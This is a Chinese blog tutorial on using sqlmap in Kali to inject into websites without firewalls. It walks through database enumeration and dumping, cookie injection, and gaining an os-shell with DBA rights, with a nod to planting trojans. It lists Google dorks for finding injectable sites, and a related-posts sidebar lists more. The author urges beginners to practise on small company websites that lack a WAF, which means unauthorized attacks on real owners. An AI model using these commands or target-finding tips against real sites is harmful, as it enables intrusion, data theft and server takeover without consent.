kali下sqlmap注入无防火墙网址

最新推荐文章于 2024-04-29 23:18:49 发布
最新推荐文章于 2024-04-29 23:18:49 发布
阅读量2.4k 收藏 15
点赞数
文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/76040010
版权

 

如果文章中有错误或是语言不妥

请给予斧正!万分感谢!

 

0x01(关于Accesss数据库)

 

想要注入就要找到一个注入点

检测注入点:

 

sqlmap -u "目标网址"

根据返回的信息可以得到

 

1->是否有防火墙或者狗之类的安全机制(在这里就不提如何绕过)

2->分为可以注入和不可以注入

      可以注入:在结尾会显示目标网站的数据库信息

      无法注入:就要尝试其他的方法

在这里我们用理想化的方式

     这个注入点可以注入&&返回的是Access数据库

 

   sqlmap -u “目标网址” --tables          --tables 显示所有表名

     我们要先暴力拆解所有的表名

 

     只有得到我们想要的表,通过表猜解列明

     注:在拆解表名时,会提示输入线程 (1-10)

得到表名

  sqlmap -u “目标网站” --columns -T "表名"     --columns  猜解列名

    同样的,需要输入线程(1-10)

最后一步

  sqlmap -u "目标网站" --dump -C "需要猜解的列名,需要猜解的列名" -T "表名"

 

0x02(关于MySQL数据库)

我们依旧理想化,没有防火墙,看门狗等安全机制。

 

sqlmap -u "目标网站"   进行注入点测试


理想化:

 

 可以注入

这时我们可以先检测一下有没有dba权限  先检测dba权限

 

sqlmap -u "目标站点" --is-dba

 

什么是dba权限?通俗来讲,如果我们获取这个权限就可以直接写目(mu)录(ma)

 

 

如果存在dba权限,会显示true

接着,终端就会显示,让你选择网站的类型

类似于

1.asp

2.php

3.

4.

然后就填写数组回车

终端会显示

 

os-shell>


接下来你就可以进行对目录的操作

 

存在dba权限,也可以输入

 

sqlmap -u"目标网址” -os-shell

 

 

 

这样也可以

 

 

我们接着说正常的注入

 

sqlmap -u "目标网站" --dbs   我们先看看到底有多少个数据库

然后,拿着你的目标

 

sqlmap -u "目标站点" --tables-D "你目标数据库名字"

或者,我们可以直接找到自己所在数据库

 

 

sqlmap -u "目标站点" --current-db  找到自己所在的数据库


接着,猜解表名

sqlmap -u "目标站点" --tables-D "数据库名"

根据表名猜解列名

 

 

sqlmap -u "目标网站" --columns-T "表名" -D "数据库名"

 

猜解字段

 

sqlmap -u "目标站点" --dump-C "字段,字段" -T "表名" -D “数据库名”

 

 

 

0x03(Cookie注入(适合asp网站))

 

sqlmap -u "目标网址" --cookie “id=xx” --level 2(提升等级)


一定要注意,这里目标网址不是http:www.XXXX?id=xx,我们要去掉?id=XXX

例如:www.xxx.asp?id=100

          我们怎么写呐?

          www.xxx.asp

         我们把?id=100放到哪里呐?

         在后面,"id=100"就可以了

这样,我们就可以获得网站的数据库类型

     根据类型来选择用0x01还是0x02

 

 

 

0x04 如何找到一些简单的网站进行注入

1->大家都是从新手走过来的,大多数新手都喜欢找一些简单网站进行注入

   利用的谷歌关键字搜索

 

  inur:asp?id=
  inur:php?id=


我的意见是:找一些小型企业网站,一般不会有WAF之类的,可以进行练手。


2->当然,如果自己有能力,可以用虚拟机组建渗透测试环境

 

 

 

 

 

梵歆
关注
  • 0
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3189
学习sqlmap自动注入
HTML学习资料 50课
12-29
HTML学习50课doc格式 inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct.asp?id=随便加个数字 inurl:ManageLogin.asp EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字) inurl:Article_Print.asp? site 指定网站 inurl:Article_Print.asp? NewsInfo.asp?id= ShowNew.asp?Id= ShowNews.asp?Id= Show.asp?Id= Google dorks sql injection: inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file=
网络安全:Kali Linux 进行SQL注入与XSS漏洞利用
最新发布
2401_84267585的博客
04-29 634
(2)查看Kali Linux (2022.4)系统版本(3) 查看Kali Linux (2022.4)系统IP地址(4)Windows 查看IP地址ipconfig(5)Kali主机 ping Windows主机。
编辑器漏洞,pker扫描
VioletKiss
05-10 1092
服务器存在任意文件下载漏洞,利用漏洞,实施攻击,获取网站管理权 1.查看网站 查看网站是否有上传附件的控件,是否能上传木马文件。 2.打开pker多线程后台极速扫描器 在扫描目标上填入网站网址,或者网站ip:端口。选择脚步类型为asp,根据网站类型选择,目标类型选为数据库,开始扫描 3.查看报告 扫描完毕后查看报告,下载打开.mdb后缀的数据库文
寻找sql注入的网站的方法
u014796999的博客
11-14 1万+
方法一:利用google高级搜索,比如搜索url如.asp?id=9如下所示: (说明:后缀名为php的类似)
kali linux 下sqlmap注入ACCESS数据库.doc
03-04
Kali Linux 下 SQLmap 注入 ACCESS 数据库 Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面...
sqlmap注入漏洞测试
02-22
SQLMap 注入漏洞测试 在 Web 应用程序中, SQL 注入是一种常见的安全漏洞,它可以让攻击者访问和控制数据库中的敏感数据。SQLMap 是一款自动化的 SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
Kali下安装sublime text3.docx
06-16
Kali Linux操作系统中安装Sublime Text 3是开发者常用的操作,因为Sublime Text是一款功能强大的文本编辑器,尤其受到编程人员的青睐。它支持多种编程语言,具有代码高亮、自动完成、多选编辑、分割视图等功能,极...
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍中文翻译。
国外经典的SQL注入攻防教程中文版
11-13
最近看了不少老外写的东西,看时间相同的技术当铺比我们早了好长一段时间,比如ASP的SQL注射国外02年就出现了,PHP的也在04年出现,而我们一直到05年才接触到,看看比人家晚了多少时间呀! 为了尽快了解最新的技术动态,我坚持看E文资料,有的很长,有的很短,本人时间有限,不可能一一翻译过来,只能挑选自己认为比较适合大家看的东西翻译过来,希望你能从中学到东西。
渗透1
甜航一直在的博客
11-29 905
渗透测试:查找服务器的问题,倾向于保护 入侵:不择手段的达到权限 渗透测试流程:明确目标(范围 规则 需求 ) 信息收集(基础 系统 应用 人员 服务 版本 防护) 漏洞探测(系统 web webserver 其他端口 通信安全) 漏洞验证(自动化 手工 试验 猜解 业务 公开资源) 信息分析(精准打击 绕过防御机制 定制攻击路径 绕过检测机制 攻击代码) 获取所需...
从日朋友的网站-到子域名枚举
weixin_30895603的博客
03-14 373
前言: 朋友知道我是学安全的(辣鸡一个),他写了一个网站,想让我日一下,看有什么漏洞吗?( ̄▽ ̄)"当时就想这个傻冒写的东西肯定很好日,所以当时就想到了用sqlmap跑一下,看能不能把它的裤子给脱了。但是跑完之后。。。。。。。。什么了没有。然后我静下心一下怎么没有注入点呢?或者看一下他的网站有没有子域名。所以就想到了看能不能写一个子域名枚举的脚本。所以就写了下面的脚本。下面是程序的...
渗透网站搜寻
热门推荐
lgzlyy的专栏
12-14 1万+
nurl:CompHonorBig.asp?id= Article_print.asp?ArticleID= inurl:conpany.asp?id= inurl:products.asp?id= inurl:newsSHOw.asp?id= inurlasp=XXX?) site:jp搜索日本网站 inurl:asp?id=  cat.asp?cat=  produc
Kali网络渗透测试实验三——XSS和SQL注入
qq_45746876的博客
11-24 3329
XSS和SQL注入前言实验目的系统环境:Kali Linux 2、Windows ServerXSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞2.Kali使用beef生成恶意代码3.访问http://留言簿网站,将恶意代码写入网站留言板4.管理员登录login.htm,账号密码均为admin,审核用户留言5.回答问题SQL注入部分:DVWA+SQLmap+Mysql注入实战sqlmap语法参考1.注入点发现2.枚举当前使用的数据库名称和用户名3
kali攻防第14章 SQLMAP之漏洞服务器
安全参透之旅
12-29 2723
SQLMAP之漏洞服务器 准备工具 1、kali 系统IP 10.10.10.131 2、受害网站 3、使用工具sqlmap     步骤: 1、登录受害网站 网址设置为 出现Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in E:\WWW\techdetai
十款免费防火墙
weixin_34038293的博客
10-29 673
1、蓝盾防火墙个人版 蓝盾个人防火墙是由蓝盾安全开发研究小组开发的一套真对个人上网用户的智能防御系统,它包容了传统防火墙的特点。具有以下优明显优势。1、 有效的拦截各种***,探测包。用户可自行设定安全规则,采用系统默认的来拦截***的***和探测包。2、 强大的反追踪功能。当受到***的***和探测时能自动的报警。并将反追踪来的***的踪迹显示出来。包括计算机名,用户...
kali 安装sqlmap
10-05
5. 将sqlmap目录移动到/usr/share/目录下:sudo mv sqlmap-dev /usr/share/sqlmap 6. 确保/usr/share/sqlmap中的sqlmap.py文件具有执行权限。您可以使用以下命令更改权限:sudo chmod +x /usr/share/sqlmap/sqlmap....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值